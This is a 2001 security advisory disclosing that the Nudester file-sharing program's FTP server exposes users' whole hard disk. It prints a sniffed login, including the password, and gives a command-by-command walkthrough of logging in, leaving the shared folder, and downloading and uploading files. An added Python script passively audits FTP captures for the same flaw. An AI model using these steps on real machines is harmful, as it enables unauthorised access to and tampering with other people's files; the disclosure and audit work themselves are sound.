OSEC

From: Gary (Cyph3rphreaker.net)
Date: Thu Aug 16 2001 - 22:10:22 CDT


    <------------------------->
    [Real Security Advisory #1]
    [ Author: Cyph3r ]
    [ www.Real-Security.org ]
    [ Date: 08/16/2001 ]
    <------------------------->
    [Vulnerable: ]
    [Nudester 1.10 (and below?)]
    [ OS: Win9x/me/2k/nt/xp ]
    [ Site: www.nudester.org ]
    <------------------------->

    -> Severity: Malicious users can gain full read/write access to the user's
    files (upload/download)

    -> Overview: Nudester, a file sharing program for porn, uses the FTP protocol
    to transfer files. The problem is that its built-in FTP server gives access
    to the whole hard disk instead of just the folder containing porn. Since FTP
    sends the username and password in cleartext on port 21, the password can be
    captured with a sniffer and then reused from a normal FTP client.
    Example:
    Open Nudester and a sniffer program, e.g. Iris (www.eeye.com), and download a
    file from a user on Nudester while the sniffer is running with a filter on
    port 21 so you can capture the password.

    <Sniffed Data>

    220 ICS FTP Server ready
    user NUDESTER
    331 Password required for NUDESTER
    pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
    230 User NUDESTER logged in

    </Sniffed Data>

    Open an ftp client and connect to the ip

    ftp> open ***.***.***.***
    Connected to ***.***.***.***
    220 ICS FTP Server ready.
    User (***.***.***.***:(none)): NUDESTER
    331 Password required for NUDESTER.
    Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
    230 User NUDESTER logged in.

    - Bingo!

    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    C:\TEMP\*.* not found
    226 File sent ok
    ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
    ftp> cd ..
    250 CWD command successful. "C:/" is current directory.
    ftp> DIR
    200 Port command successful.
    150 Opening data connection for directory list.
    -rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
    -rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
    -rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
    -rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
    -rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
    -rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
    -rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
    -rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
    drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
    -rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
    -rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
    -rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
    drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
    drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
    -rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
    -rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
    -rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
    -rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
    dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
    -rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
    -rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
    -rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
    -rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
    drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
    -rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
    -rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
    -rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
    -rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
    -rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
    -rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
    -rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
    drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
    -rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
    drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
    -rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
    -rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
    drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
    drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
    drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
    drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
    -rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
    -rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
    226 File sent ok
    ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.

    - Let's see if we have access to download a file

    ftp> get netsig.txt
    200 Port command successful.
    150 Opening data connection for netsig.txt.
    226 File sent ok
    ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.

    - Yep, let's try to upload a file

    ftp> put c:\temp.txt
    200 Port command successful.
    150 Opening data connection for TEMP.TXT.
    226 File received ok
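    The two facts the steps above rely on, cleartext credentials on the control
    channel and a CWD reply that lands at the drive root, can be checked from a
    capture without interacting with the server. The following is an added
    example, not code from the advisory or from Nudester: it parses a constructed
    FTP control-channel transcript (built from the exchange printed above) and
    reports any USER/PASS pair and any 250 reply that names a drive root as the
    current directory. The function and class names are the example's own.

```python
"""Passive audit of a captured FTP control session.

Input is the control channel as a sniffer filtering TCP port 21 shows it,
one client command or server reply per line.  The audit reports:

  1. credentials sent in the clear (USER / PASS commands), and
  2. server replies showing the session sits at a drive root, i.e. the
     server is not restricting the client to a shared folder.

Added example, not part of the original advisory.  SAMPLE_CAPTURE is
constructed from the exchange the advisory prints.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the sniffed login, then the "cd .." step from the advisory.
SAMPLE_CAPTURE = """\
220 ICS FTP Server ready
USER NUDESTER
331 Password required for NUDESTER
PASS NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in
CWD ..
250 CWD command successful. "C:/" is current directory.
"""

# A 250 reply quoting a bare drive root, e.g. "C:/" or "C:\", means the client
# has escaped whatever folder the application meant to share.
CWD_ROOT = re.compile(r'^250 .*"([A-Za-z]:[/\\])" is current directory', re.I)


@dataclass
class FtpAuditResult:
    username: Optional[str] = None
    password: Optional[str] = None
    logged_in: bool = False
    root_escapes: List[str] = field(default_factory=list)

    @property
    def credentials_exposed(self) -> bool:
        # Both halves of a login were visible on the wire.
        return self.username is not None and self.password is not None


def audit_ftp_session(capture: str) -> FtpAuditResult:
    """Walk the transcript line by line and collect the findings above."""
    result = FtpAuditResult()
    for raw in capture.splitlines():
        line = raw.rstrip("\r")
        if not line:
            continue
        # Client commands are "VERB [argument]"; FTP verbs are case-insensitive.
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            result.username = arg
        elif verb == "PASS":
            result.password = arg
        elif line.startswith("230"):
            # 230 is the successful-login reply, so the sniffed pair is valid.
            result.logged_in = True
        else:
            match = CWD_ROOT.match(line)
            if match:
                result.root_escapes.append(match.group(1))
    return result


if __name__ == "__main__":
    r = audit_ftp_session(SAMPLE_CAPTURE)
    if r.credentials_exposed:
        print(f"cleartext login: {r.username} / {r.password} (accepted: {r.logged_in})")
    for root in r.root_escapes:
        print(f"session reached drive root {root}; server is not jailed to a folder")
```

    Feed it the text of any port-21 capture; a result with `credentials_exposed`
    true and a non-empty `root_escapes` list reproduces exactly the condition the
    advisory describes, without needing to log in to anything.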

    -> Conclusion: anyone can gain full access to a Nudester user's files. The
    username is the same for every user; the password is not, so you have to
    sniff your own download from that user to retrieve it.
    The only solution to this problem is not to use Nudester.

    -> Credits: Cyph3r - Cyph3rphreaker.net

    -> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
    spasms, trew, zeronine, matt, shizniz, z0mb1e
    b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.